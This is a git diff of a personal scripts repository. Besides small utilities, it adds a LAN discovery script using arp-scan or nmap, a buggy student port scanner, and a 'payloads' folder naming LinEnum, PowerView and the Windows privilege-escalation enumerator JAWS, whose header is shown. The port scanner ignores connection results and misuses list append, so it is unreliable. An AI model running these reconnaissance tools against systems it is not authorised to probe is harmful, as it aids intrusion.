#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: nato
|
||||
# Description: Convert strings to NATO phonetic alphabet
|
||||
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: nato bar # Output: Bravo Alfa Romeo
|
||||
# nato "hello 123"
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: nato <string>" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# NATO phonetic alphabet mapping
|
||||
declare -A nato_map=(
|
||||
[a]="Alfa" [b]="Bravo" [c]="Charlie" [d]="Delta" [e]="Echo"
|
||||
[f]="Foxtrot" [g]="Golf" [h]="Hotel" [i]="India" [j]="Juliett"
|
||||
[k]="Kilo" [l]="Lima" [m]="Mike" [n]="November" [o]="Oscar"
|
||||
[p]="Papa" [q]="Quebec" [r]="Romeo" [s]="Sierra" [t]="Tango"
|
||||
[u]="Uniform" [v]="Victor" [w]="Whiskey" [x]="Xray" [y]="Yankee"
|
||||
[z]="Zulu"
|
||||
[0]="Zero" [1]="One" [2]="Two" [3]="Three" [4]="Four"
|
||||
[5]="Five" [6]="Six" [7]="Seven" [8]="Eight" [9]="Niner"
|
||||
)
|
||||
|
||||
# Convert all arguments to lowercase and process each character
|
||||
input="$(echo "$*" | tr '[:upper:]' '[:lower:]')"
|
||||
|
||||
result=()
|
||||
while IFS= read -r -n1 char; do
|
||||
# Skip empty characters
|
||||
[[ -z "$char" ]] && continue
|
||||
|
||||
if [[ -n "${nato_map[$char]:-}" ]]; then
|
||||
result+=("${nato_map[$char]}")
|
||||
elif [[ "$char" == " " ]]; then
|
||||
result+=("/") # Use / as space separator
|
||||
fi
|
||||
done <<< "$input"
|
||||
|
||||
# Output with spaces between words
|
||||
echo "${result[*]}"
|
||||
476
scripts/network-discovery.sh
Executable file
476
scripts/network-discovery.sh
Executable file
|
|
@ -0,0 +1,476 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: network-discovery.sh
|
||||
# Description: Discover devices on local network and highlight the newest device
|
||||
# Version: 1.0.0
|
||||
# Dependencies: arp-scan (or nmap), gum (optional but recommended)
|
||||
|
||||
# === Configuration ===
|
||||
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
|
||||
readonly VERSION="1.0.0"
|
||||
readonly LOGFILE="${LOGFILE:-/tmp/$(basename "$0" .sh)-$$.log}"
|
||||
|
||||
# Ensure log file is writable
|
||||
touch "$LOGFILE" 2>/dev/null || LOGFILE="/dev/null"
|
||||
chmod 644 "$LOGFILE" 2>/dev/null || true
|
||||
|
||||
# Colors for output
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# === Logging Functions ===
|
||||
log() {
|
||||
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [INFO] $*" | tee -a "$LOGFILE"
|
||||
}
|
||||
|
||||
log_error() {
|
||||
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [ERROR] $*" | tee -a "$LOGFILE" >&2
|
||||
}
|
||||
|
||||
log_warn() {
|
||||
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [WARN] $*" | tee -a "$LOGFILE"
|
||||
}
|
||||
|
||||
# === Cleanup Handler ===
|
||||
TEMP_FILES=()
|
||||
|
||||
cleanup() {
|
||||
local exit_code=$?
|
||||
|
||||
# Clean temp files
|
||||
for file in "${TEMP_FILES[@]}"; do
|
||||
[[ -f "$file" ]] && rm -f "$file"
|
||||
done
|
||||
|
||||
# Clean log file on successful completion
|
||||
if [[ $exit_code -eq 0 ]] && [[ "$LOGFILE" != "/dev/null" ]]; then
|
||||
rm -f "$LOGFILE" 2>/dev/null || true
|
||||
fi
|
||||
|
||||
exit $exit_code
|
||||
}
|
||||
|
||||
trap cleanup EXIT INT TERM
|
||||
|
||||
# === Dependency Checking ===
|
||||
HAS_GUM=false
|
||||
HAS_ARP_SCAN=false
|
||||
SCAN_METHOD=""
|
||||
|
||||
check_dependencies() {
|
||||
# Check for gum (optional) - check common locations
|
||||
if command -v gum &>/dev/null; then
|
||||
HAS_GUM=true
|
||||
elif [[ -x "$HOME/go/bin/gum" ]]; then
|
||||
HAS_GUM=true
|
||||
export PATH="$HOME/go/bin:$PATH"
|
||||
elif [[ -x "/home/e/go/bin/gum" ]]; then
|
||||
HAS_GUM=true
|
||||
export PATH="/home/e/go/bin:$PATH"
|
||||
fi
|
||||
|
||||
# Check for scanning tools
|
||||
if command -v arp-scan &>/dev/null; then
|
||||
HAS_ARP_SCAN=true
|
||||
SCAN_METHOD="arp-scan"
|
||||
elif command -v nmap &>/dev/null; then
|
||||
SCAN_METHOD="nmap"
|
||||
log_warn "Using nmap (arp-scan recommended for better MAC detection)"
|
||||
else
|
||||
log_error "No network scanning tool found"
|
||||
echo "Please install one of:"
|
||||
echo " sudo apt install arp-scan (recommended)"
|
||||
echo " sudo apt install nmap"
|
||||
return 1
|
||||
fi
|
||||
|
||||
return 0
|
||||
}
|
||||
|
||||
# === UI Functions ===
|
||||
show_header() {
|
||||
clear
|
||||
|
||||
if [[ "$HAS_GUM" == "true" ]]; then
|
||||
gum style \
|
||||
--border thick \
|
||||
--border-foreground 12 \
|
||||
--align center \
|
||||
--width 60 \
|
||||
--margin "1" \
|
||||
--padding "1 2" \
|
||||
"🔍 NETWORK DEVICE DISCOVERY" \
|
||||
"" \
|
||||
"v${VERSION}" \
|
||||
"Scanning local network..."
|
||||
echo
|
||||
else
|
||||
echo -e "${BLUE}╔════════════════════════════════════════════════════╗${NC}"
|
||||
echo -e "${BLUE}║${NC} 🔍 ${BOLD}NETWORK DEVICE DISCOVERY${NC} ${BLUE}║${NC}"
|
||||
echo -e "${BLUE}║${NC} ${BLUE}║${NC}"
|
||||
echo -e "${BLUE}║${NC} v${VERSION} ${BLUE}║${NC}"
|
||||
echo -e "${BLUE}║${NC} Scanning local network... ${BLUE}║${NC}"
|
||||
echo -e "${BLUE}╚════════════════════════════════════════════════════╝${NC}"
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# === Network Functions ===
|
||||
get_local_network() {
|
||||
# Get the default gateway and derive network
|
||||
local gateway
|
||||
gateway=$(ip route | grep default | awk '{print $3}' | head -n1)
|
||||
|
||||
if [[ -z "$gateway" ]]; then
|
||||
log_error "Could not determine default gateway"
|
||||
return 1
|
||||
fi
|
||||
|
||||
# Extract network (assumes /24)
|
||||
local network
|
||||
network=$(echo "$gateway" | cut -d. -f1-3)
|
||||
echo "${network}.0/24"
|
||||
}
|
||||
|
||||
scan_network_arp_scan() {
|
||||
local network="$1"
|
||||
local output_file="$2"
|
||||
|
||||
if [[ "$HAS_GUM" == "true" ]]; then
|
||||
echo -e "${CYAN}🔍 Scanning network with arp-scan...${NC}"
|
||||
(
|
||||
sudo arp-scan --interface=eth0 --localnet 2>/dev/null || \
|
||||
sudo arp-scan --interface=wlan0 --localnet 2>/dev/null || \
|
||||
sudo arp-scan --localnet 2>/dev/null
|
||||
) | tee "$output_file" &
|
||||
|
||||
local scan_pid=$!
|
||||
# Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
|
||||
gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
|
||||
wait $scan_pid
|
||||
else
|
||||
echo -e "${CYAN}⏳ Scanning network with arp-scan...${NC}"
|
||||
sudo arp-scan --localnet 2>/dev/null | tee "$output_file"
|
||||
fi
|
||||
}
|
||||
|
||||
scan_network_nmap() {
|
||||
local network="$1"
|
||||
local output_file="$2"
|
||||
|
||||
if [[ "$HAS_GUM" == "true" ]]; then
|
||||
echo -e "${CYAN}🔍 Scanning network with nmap...${NC}"
|
||||
(
|
||||
sudo nmap -sn -PR "$network" 2>/dev/null
|
||||
) | tee "$output_file" &
|
||||
|
||||
local scan_pid=$!
|
||||
# Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
|
||||
gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
|
||||
wait $scan_pid
|
||||
else
|
||||
echo -e "${CYAN}⏳ Scanning network with nmap...${NC}"
|
||||
sudo nmap -sn -PR "$network" 2>/dev/null | tee "$output_file"
|
||||
fi
|
||||
}
|
||||
|
||||
parse_arp_scan_results() {
|
||||
local scan_file="$1"
|
||||
local results_file="$2"
|
||||
|
||||
# Parse arp-scan output: IP, MAC, Vendor
|
||||
# arp-scan format: 192.168.1.1 aa:bb:cc:dd:ee:ff Vendor Name
|
||||
# Using pipe (|) as delimiter instead of comma to handle vendor names with commas
|
||||
grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" "$scan_file" | \
|
||||
grep -v "^Interface\|^Starting\|^Ending\|packets received" | \
|
||||
awk '{
|
||||
ip=$1
|
||||
mac=$2
|
||||
vendor=$3
|
||||
for(i=4;i<=NF;i++) vendor=vendor" "$i
|
||||
if(vendor=="") vendor="Unknown"
|
||||
print ip"|"mac"|"vendor
|
||||
}' > "$results_file"
|
||||
}
|
||||
|
||||
parse_nmap_results() {
|
||||
local scan_file="$1"
|
||||
local results_file="$2"
|
||||
|
||||
# After nmap scan, check entire ARP cache for all discovered devices
|
||||
log "Checking ARP cache for MAC addresses..."
|
||||
|
||||
# Get all IPs from nmap output
|
||||
local found_ips=()
|
||||
while read -r line; do
|
||||
if [[ "$line" =~ "Nmap scan report for" ]]; then
|
||||
local ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}')
|
||||
[[ -n "$ip" ]] && found_ips+=("$ip")
|
||||
fi
|
||||
done < "$scan_file"
|
||||
|
||||
# Now get MAC addresses from ARP cache
|
||||
for ip in "${found_ips[@]}"; do
|
||||
# Check arp cache
|
||||
local arp_line
|
||||
arp_line=$(arp -n | grep "^$ip " 2>/dev/null)
|
||||
|
||||
if [[ -n "$arp_line" ]]; then
|
||||
# Parse: 10.98.0.1 ether aa:bb:cc:dd:ee:ff C eth0
|
||||
local mac
|
||||
mac=$(echo "$arp_line" | awk '{print $3}')
|
||||
|
||||
# Try to get vendor info (might need additional lookup)
|
||||
local vendor="Unknown"
|
||||
if [[ "$mac" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
|
||||
# Valid MAC, try to identify device type
|
||||
case "${mac:0:8}" in
|
||||
"00:50:56"|"00:0c:29"|"00:05:69") vendor="VMware" ;;
|
||||
"08:00:27") vendor="VirtualBox" ;;
|
||||
"52:54:00") vendor="QEMU/KVM" ;;
|
||||
*) vendor="Device" ;;
|
||||
esac
|
||||
fi
|
||||
|
||||
echo "${ip},${mac},${vendor}"
|
||||
else
|
||||
echo "${ip},Unknown,Unknown"
|
||||
fi
|
||||
done > "$results_file"
|
||||
}
|
||||
|
||||
find_newest_device() {
|
||||
local results_file="$1"
|
||||
|
||||
# Get current ARP cache with timestamps
|
||||
local newest_ip=""
|
||||
local newest_mac=""
|
||||
local newest_vendor=""
|
||||
local newest_age=999999
|
||||
|
||||
# Read results and check ARP cache age (using pipe delimiter)
|
||||
while IFS='|' read -r ip mac vendor; do
|
||||
[[ -z "$ip" ]] && continue
|
||||
|
||||
# Check if device is in ARP cache
|
||||
if arp -n "$ip" &>/dev/null; then
|
||||
# Most recently added device will be at the end of the list
|
||||
# We'll use the last device found as "newest"
|
||||
newest_ip="$ip"
|
||||
newest_mac="$mac"
|
||||
newest_vendor="$vendor"
|
||||
fi
|
||||
done < "$results_file"
|
||||
|
||||
# If no ARP cache method works, just take the last device from scan
|
||||
if [[ -z "$newest_ip" ]]; then
|
||||
local last_line
|
||||
last_line=$(tail -n1 "$results_file")
|
||||
newest_ip=$(echo "$last_line" | cut -d'|' -f1)
|
||||
newest_mac=$(echo "$last_line" | cut -d'|' -f2)
|
||||
newest_vendor=$(echo "$last_line" | cut -d'|' -f3)
|
||||
fi
|
||||
|
||||
echo "${newest_ip}|${newest_mac}|${newest_vendor}"
|
||||
}
|
||||
|
||||
display_results() {
|
||||
local results_file="$1"
|
||||
local newest_device="$2"
|
||||
|
||||
local newest_ip newest_mac newest_vendor
|
||||
IFS='|' read -r newest_ip newest_mac newest_vendor <<< "$newest_device"
|
||||
|
||||
echo
|
||||
if [[ "$HAS_GUM" == "true" ]]; then
|
||||
gum style \
|
||||
--border double \
|
||||
--border-foreground 10 \
|
||||
--padding "1" \
|
||||
"📊 Discovered Devices"
|
||||
echo
|
||||
else
|
||||
echo -e "${GREEN}╔══════════════════════════════════════════════════╗${NC}"
|
||||
echo -e "${GREEN}║${NC} 📊 Discovered Devices ${GREEN}║${NC}"
|
||||
echo -e "${GREEN}╚══════════════════════════════════════════════════╝${NC}"
|
||||
echo
|
||||
fi
|
||||
|
||||
# Header
|
||||
printf "${BOLD}%-16s %-20s %-30s${NC}\n" "IP ADDRESS" "MAC ADDRESS" "VENDOR"
|
||||
echo "────────────────────────────────────────────────────────────────────"
|
||||
|
||||
# Display all devices - use awk to do ALL the formatting
|
||||
local device_count
|
||||
device_count=$(wc -l < "$results_file" 2>/dev/null || echo 0)
|
||||
|
||||
# Use awk to format everything directly (avoids pipe/subshell issues)
|
||||
awk -F '|' -v newest_ip="$newest_ip" \
|
||||
-v MAGENTA="${MAGENTA}" -v CYAN="${CYAN}" -v YELLOW="${YELLOW}" \
|
||||
-v GREEN="${GREEN}" -v BOLD="${BOLD}" -v NC="${NC}" \
|
||||
'{
|
||||
ip=$1
|
||||
mac=$2
|
||||
vendor=$3
|
||||
|
||||
if (ip == newest_ip) {
|
||||
# Newest device - HIGHLIGHT IT!
|
||||
printf "%s%s%-16s%s %s%s%-20s%s %s%-30s%s %s⭐ NEWEST%s\n", \
|
||||
BOLD, MAGENTA, ip, NC, \
|
||||
BOLD, CYAN, mac, NC, \
|
||||
YELLOW, vendor, NC, \
|
||||
GREEN, NC
|
||||
} else {
|
||||
printf "%-16s %-20s %-30s\n", ip, mac, vendor
|
||||
}
|
||||
}' "$results_file"
|
||||
|
||||
echo
|
||||
echo -e "${BLUE}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
|
||||
|
||||
# Summary box
|
||||
if [[ "$HAS_GUM" == "true" ]]; then
|
||||
gum style \
|
||||
--border rounded \
|
||||
--border-foreground 10 \
|
||||
--foreground 10 \
|
||||
--padding "1" \
|
||||
"✅ Scan Complete!" \
|
||||
"" \
|
||||
"Total devices found: ${device_count}" \
|
||||
"Newest device: ${newest_ip}" \
|
||||
"MAC Address: ${newest_mac}" \
|
||||
"Vendor: ${newest_vendor}"
|
||||
else
|
||||
echo
|
||||
echo -e "${GREEN}✅ Scan Complete!${NC}"
|
||||
echo -e "${BOLD}Total devices found:${NC} ${device_count}"
|
||||
echo
|
||||
echo -e "${BOLD}${MAGENTA}Newest Device:${NC}"
|
||||
echo -e " ${BOLD}IP:${NC} ${newest_ip}"
|
||||
echo -e " ${BOLD}MAC:${NC} ${newest_mac}"
|
||||
echo -e " ${BOLD}Vendor:${NC} ${newest_vendor}"
|
||||
fi
|
||||
|
||||
echo
|
||||
}
|
||||
|
||||
# === Usage Function ===
|
||||
usage() {
|
||||
cat << EOF
|
||||
Usage: $(basename "$0") [OPTIONS]
|
||||
|
||||
Description:
|
||||
Scan local network for devices and highlight the newest device
|
||||
|
||||
Options:
|
||||
-h, --help Show this help message
|
||||
-v, --verbose Enable verbose output
|
||||
|
||||
Examples:
|
||||
sudo $(basename "$0")
|
||||
sudo $(basename "$0") --verbose
|
||||
|
||||
Requirements:
|
||||
- Must run with sudo (for network scanning)
|
||||
- arp-scan or nmap installed
|
||||
- gum (optional, for enhanced UI)
|
||||
|
||||
EOF
|
||||
}
|
||||
|
||||
# === Main Logic ===
|
||||
main() {
|
||||
# Parse arguments
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case "$1" in
|
||||
-h|--help)
|
||||
usage
|
||||
exit 0
|
||||
;;
|
||||
-v|--verbose)
|
||||
set -x
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
log_error "Unknown option: $1"
|
||||
usage
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Check if running as root
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
log_error "This script must be run as root (for network scanning)"
|
||||
echo "Please run: sudo $0"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check dependencies
|
||||
check_dependencies || exit 2
|
||||
|
||||
# Show header
|
||||
show_header
|
||||
|
||||
# Show arp-scan tip if using nmap
|
||||
if [[ "$SCAN_METHOD" == "nmap" ]]; then
|
||||
echo -e "${YELLOW}💡 Tip: Install arp-scan for better device detection${NC}"
|
||||
echo -e "${YELLOW} Command: sudo apt install arp-scan${NC}"
|
||||
echo
|
||||
fi
|
||||
|
||||
# Get local network
|
||||
log "Detecting local network..."
|
||||
local network
|
||||
network=$(get_local_network)
|
||||
log "Network: $network"
|
||||
echo -e "${BLUE}ℹ️ Network: ${BOLD}$network${NC}"
|
||||
echo
|
||||
|
||||
# Create temp files
|
||||
local scan_file results_file
|
||||
scan_file=$(mktemp)
|
||||
results_file=$(mktemp)
|
||||
# Only add scan_file to cleanup - we need results_file until display is done
|
||||
TEMP_FILES+=("$scan_file")
|
||||
|
||||
# Scan network
|
||||
log "Scanning network with $SCAN_METHOD"
|
||||
if [[ "$SCAN_METHOD" == "arp-scan" ]]; then
|
||||
scan_network_arp_scan "$network" "$scan_file"
|
||||
parse_arp_scan_results "$scan_file" "$results_file"
|
||||
else
|
||||
scan_network_nmap "$network" "$scan_file"
|
||||
parse_nmap_results "$scan_file" "$results_file"
|
||||
fi
|
||||
|
||||
# Check if we found any devices
|
||||
if [[ ! -s "$results_file" ]]; then
|
||||
log_error "No devices found on network"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Find newest device
|
||||
log "Analyzing results..."
|
||||
local newest_device
|
||||
newest_device=$(find_newest_device "$results_file")
|
||||
|
||||
# Display results
|
||||
display_results "$results_file" "$newest_device"
|
||||
|
||||
# Clean up results file after display
|
||||
rm -f "$results_file"
|
||||
|
||||
log "✅ Network discovery complete"
|
||||
}
|
||||
|
||||
# Run main function
|
||||
main "$@"
|
||||
192
scripts/note
Executable file
192
scripts/note
Executable file
|
|
@ -0,0 +1,192 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: note
|
||||
# Description: Quick notes with tags, search, and project awareness
|
||||
# Usage: note "quick thought" # Add note
|
||||
# note -t security "found XSS" # Tagged note
|
||||
# note -s "search term" # Search notes
|
||||
# note -l # List recent notes
|
||||
# note -e # Edit notes file
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Determine notes location (project-aware)
|
||||
if git rev-parse --git-dir > /dev/null 2>&1; then
|
||||
# In a git repo - use project notes
|
||||
NOTES_FILE="$(git rev-parse --show-toplevel)/.notes.md"
|
||||
else
|
||||
# Global notes
|
||||
NOTES_FILE="$HOME/notes.md"
|
||||
fi
|
||||
|
||||
# Colors
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "\033[1mnote\033[0m - Quick Notes Tool v${VERSION}"
|
||||
echo
|
||||
echo -e "\033[1mUSAGE:\033[0m"
|
||||
echo " note <text> Add a note"
|
||||
echo " note [OPTIONS]"
|
||||
echo
|
||||
echo -e "\033[1mOPTIONS:\033[0m"
|
||||
echo -e " \033[0;36m-t, --tag\033[0m Add note with tag"
|
||||
echo -e " \033[0;36m-s, --search\033[0m Search notes"
|
||||
echo -e " \033[0;36m-l, --list\033[0m List recent notes (last 10)"
|
||||
echo -e " \033[0;36m-e, --edit\033[0m Edit notes file"
|
||||
echo -e " \033[0;36m-p, --path\033[0m Show notes file path"
|
||||
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||
echo
|
||||
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||
echo " note \"remember to test this\""
|
||||
echo " note -t security \"found XSS in login\""
|
||||
echo " note -t todo \"implement feature X\""
|
||||
echo " note -s \"XSS\""
|
||||
echo " note -l"
|
||||
echo
|
||||
echo -e "\033[1mNOTES LOCATION:\033[0m"
|
||||
echo " Current: ${NOTES_FILE}"
|
||||
if git rev-parse --git-dir > /dev/null 2>&1; then
|
||||
echo -e " ${CYAN}(Project notes - in git repo)${NC}"
|
||||
else
|
||||
echo -e " ${YELLOW}(Global notes)${NC}"
|
||||
fi
|
||||
}
|
||||
|
||||
# Add note
|
||||
add_note() {
|
||||
local text="$1"
|
||||
local tag="${2:-general}"
|
||||
|
||||
# Create file if it doesn't exist
|
||||
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||
echo "# Notes" > "$NOTES_FILE"
|
||||
echo >> "$NOTES_FILE"
|
||||
fi
|
||||
|
||||
# Format: ## YYYY-MM-DD HH:MM - [TAG]
|
||||
timestamp=$(date '+%Y-%m-%d %H:%M')
|
||||
echo "## $timestamp - [$tag]" >> "$NOTES_FILE"
|
||||
echo >> "$NOTES_FILE"
|
||||
echo "$text" >> "$NOTES_FILE"
|
||||
echo >> "$NOTES_FILE"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Note added to: ${NOTES_FILE}"
|
||||
echo -e "${CYAN}Tag:${NC} $tag"
|
||||
}
|
||||
|
||||
# Search notes
|
||||
search_notes() {
|
||||
local query="$1"
|
||||
|
||||
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||
echo -e "${YELLOW}No notes file found${NC}" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
|
||||
echo
|
||||
|
||||
# Use bat if available for syntax highlighting, otherwise grep with context
|
||||
if command -v bat &>/dev/null; then
|
||||
grep -i --color=always "$query" "$NOTES_FILE" -B 2 -A 2 || echo "No matches found"
|
||||
else
|
||||
grep -i --color=always "$query" "$NOTES_FILE" -B 2 -A 2 || echo "No matches found"
|
||||
fi
|
||||
}
|
||||
|
||||
# List recent notes
|
||||
list_recent() {
|
||||
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||
echo -e "${YELLOW}No notes file found${NC}" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Recent Notes (last 10):${NC}"
|
||||
echo
|
||||
|
||||
# Extract last 10 note entries (sections starting with ##)
|
||||
awk '
|
||||
/^## / {
|
||||
if (count > 0 && count <= 10) {
|
||||
print section
|
||||
}
|
||||
section = $0 "\n"
|
||||
count++
|
||||
next
|
||||
}
|
||||
count > 0 && count <= 10 {
|
||||
section = section $0 "\n"
|
||||
}
|
||||
END {
|
||||
if (count > 0 && count <= 10) {
|
||||
print section
|
||||
}
|
||||
}
|
||||
' "$NOTES_FILE" | tail -n +2
|
||||
}
|
||||
|
||||
# Edit notes
|
||||
edit_notes() {
|
||||
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||
echo "# Notes" > "$NOTES_FILE"
|
||||
echo >> "$NOTES_FILE"
|
||||
fi
|
||||
|
||||
${EDITOR:-vim} "$NOTES_FILE"
|
||||
}
|
||||
|
||||
# Show path
|
||||
show_path() {
|
||||
echo "$NOTES_FILE"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case $1 in
|
||||
-h|--help)
|
||||
show_help
|
||||
;;
|
||||
-t|--tag)
|
||||
if [[ $# -lt 3 ]]; then
|
||||
echo -e "${RED}Error:${NC} Tag and note text required" >&2
|
||||
echo "Usage: note -t <tag> <text>" >&2
|
||||
exit 1
|
||||
fi
|
||||
tag="$2"
|
||||
shift 2
|
||||
text="$*"
|
||||
add_note "$text" "$tag"
|
||||
;;
|
||||
-s|--search)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Search query required" >&2
|
||||
exit 1
|
||||
fi
|
||||
shift
|
||||
search_notes "$*"
|
||||
;;
|
||||
-l|--list)
|
||||
list_recent
|
||||
;;
|
||||
-e|--edit)
|
||||
edit_notes
|
||||
;;
|
||||
-p|--path)
|
||||
show_path
|
||||
;;
|
||||
*)
|
||||
# Default: add note with "general" tag
|
||||
add_note "$*"
|
||||
;;
|
||||
esac
|
||||
109
scripts/old-port-scanner.py
Executable file
109
scripts/old-port-scanner.py
Executable file
|
|
@ -0,0 +1,109 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
# Information Security
|
||||
# Certification Project #3
|
||||
|
||||
import socket
|
||||
import common_ports
|
||||
import re
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
# Testing
|
||||
# target = "www.freecodecamp.org"
|
||||
# target = socket.gethostbyname("www.freecodecamp.org")
|
||||
# target = "hi"
|
||||
# port_range = [75,85]
|
||||
|
||||
# Testing Function
|
||||
# get_open_ports(target, port_range)
|
||||
|
||||
|
||||
def get_open_ports(target, port_range, verbose=None):
|
||||
# Test if target is URL or IP address, if invalid give correct error message
|
||||
|
||||
target_ip = None
|
||||
target_url = None
|
||||
try:
|
||||
ip_addr = socket.gethostbyname(target)
|
||||
except:
|
||||
if re.search('^[0-9]+', target):
|
||||
print('Target:', target, 'is an ip address')
|
||||
target_ip = True
|
||||
print('Error: Invalid IP address')
|
||||
exit()
|
||||
elif re.search('^[A-Za-z]+', target):
|
||||
print('Target:', target, 'is a url')
|
||||
target_url = True
|
||||
print('Error: Invalid hostname')
|
||||
exit()
|
||||
print('Error: Invalid hostname or IP address')
|
||||
exit()
|
||||
|
||||
# Creates list of ports from starting and ending ports given
|
||||
ports_list = list()
|
||||
for port in port_range:
|
||||
while port <= port_range[1]:
|
||||
ports_list.append(port)
|
||||
port += 1
|
||||
|
||||
# Connects (if url/ip is valid) and checks for open ports
|
||||
open_ports = []
|
||||
# for each port in list, connect
|
||||
for port in ports_list:
|
||||
print('Checking port:', port, 'for target:', target)
|
||||
# if port is open, add to open_ports
|
||||
try:
|
||||
s.connect_ex((target, port)) # == 0
|
||||
s.settimeout(5)
|
||||
open_ports.append[port]
|
||||
print('Port', port, 'is open')
|
||||
print('Open ports:', open_ports)
|
||||
|
||||
# if it can't connect, display correct output
|
||||
except socket.error or socket.gaierror or socket.getaddrinfo:
|
||||
if target_ip:
|
||||
print('Error: Invalid IP address')
|
||||
exit()
|
||||
elif target_url:
|
||||
print('Error: Invalid hostname')
|
||||
exit()
|
||||
except:
|
||||
print('Port', port, 'is closed')
|
||||
continue
|
||||
print('\n* Finished scanning target *')
|
||||
if not open_ports:
|
||||
print('No open ports found on target', target)
|
||||
else:
|
||||
print('Open ports found:', open_ports, 'on', target)
|
||||
|
||||
# Output
|
||||
print(f'\n* Scanning Target: {target} ({ip_addr}) *')
|
||||
print('- Scanning ports:', port_range[0], 'to', port_range[-1])
|
||||
|
||||
# Verbose Output
|
||||
# ports = tuple()
|
||||
# service = dict()
|
||||
serv_d = common_ports.ports_and_services
|
||||
# for each port in open_ports
|
||||
svcs_dict = {port: serv_d[port] for port in open_ports}
|
||||
# svcs_list = [ v for k,v in svcs_dict.items() ]
|
||||
|
||||
if verbose:
|
||||
print(f'\nOpen ports for {target} ({ip_addr})')
|
||||
print('PORT SERVICE')
|
||||
# for port in open_ports:
|
||||
# print(f'{port} {common_ports.ports_and_services[port]}')
|
||||
# print(f'{port} {common_ports.ports_and_services(port)}')
|
||||
# for opts in service:
|
||||
for port, service in svcs_dict.items():
|
||||
print(str(port) + ' ' + str(service))
|
||||
# return print('{} {}'.format(port, service))
|
||||
return
|
||||
|
||||
elif not verbose:
|
||||
print('Open Ports:', open_ports)
|
||||
s.close()
|
||||
return
|
||||
return (open_ports)
|
||||
# return(target, port_range)
|
||||
1352
scripts/payloads/LinEnum.sh
Normal file
1352
scripts/payloads/LinEnum.sh
Normal file
File diff suppressed because it is too large
Load diff
20914
scripts/payloads/PowerView.ps1
Normal file
20914
scripts/payloads/PowerView.ps1
Normal file
File diff suppressed because it is too large
Load diff
280
scripts/payloads/jaws-enum.ps1
Normal file
280
scripts/payloads/jaws-enum.ps1
Normal file
|
|
@ -0,0 +1,280 @@
|
|||
<#
|
||||
.SYNOPSIS
|
||||
Windows enumeration script
|
||||
.DESCRIPTION
|
||||
This script is designed to be used in a penetration test or CTF
|
||||
enviroment. It will enumerate useful information from the host
|
||||
for privilege escalation.
|
||||
.EXAMPLE
|
||||
PS > .\jaws-enum.ps1
|
||||
will write results out to screen.
|
||||
.EXAMPLE
|
||||
PS > .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
|
||||
Writes out results to Jaws-Enum.txt in current directory.
|
||||
.LINK
|
||||
https://github.com/411Hall/JAWS
|
||||
#>
|
||||
Param(
|
||||
[String]$OutputFilename = ""
|
||||
)
|
||||
|
||||
function JAWS-ENUM {
|
||||
write-output "`nRunning J.A.W.S. Enumeration"
|
||||
$output = ""
|
||||
$output = $output + "############################################################`r`n"
|
||||
$output = $output + "## J.A.W.S. (Just Another Windows Enum Script) ##`r`n"
|
||||
$output = $output + "## ##`r`n"
|
||||
